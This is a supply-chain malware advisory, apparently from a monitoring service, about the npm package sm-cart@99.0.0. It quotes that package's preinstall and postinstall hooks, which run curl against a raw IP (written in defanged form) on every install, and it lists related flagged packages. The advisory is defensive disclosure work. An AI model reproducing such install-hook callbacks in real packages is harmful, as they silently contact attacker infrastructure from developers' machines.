LWA-2026-11573 confirmed malware
sm-cart@99.0.0
Malicious code in sm-cart (npm)
T1059 · Command and Scripting InterpreterT1071.001 · Web Protocols
Analysis
The package's preinstall and postinstall hooks each run `curl -s hxxp://16[.]192[.]173[.]5/sm-cart/pre` and `curl -s hxxp://16[.]192[.]173[.]5/sm-cart/post` respectively, making an outbound network callback to the raw IP 16[.]192[.]173[.]5 on every install. The package contains no functional code — its only module logs a message and exports an empty object — so the sole purpose of the install hooks is the network callback to 16[.]192[.]173[.]5.
- analyzed by
- Leitwacht
- first seen
- Aug 23, 2026, 06:30 PM
- analyzed
- Aug 23, 2026, 06:30 PM
Related advisories
- hydration-dim-kit@1.0.0
- fetch-page-assets@1.2.13
- @syncraft-labs/core@0.4.1
- hatdhat-testkit@3.2.14
- solidity-testing-utils@1.2.0
- rust-testing-utils@2.3.0
- @pablo_clueless/sniffr@0.1.1
- @httttt/mcp-npx-fetch-1@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.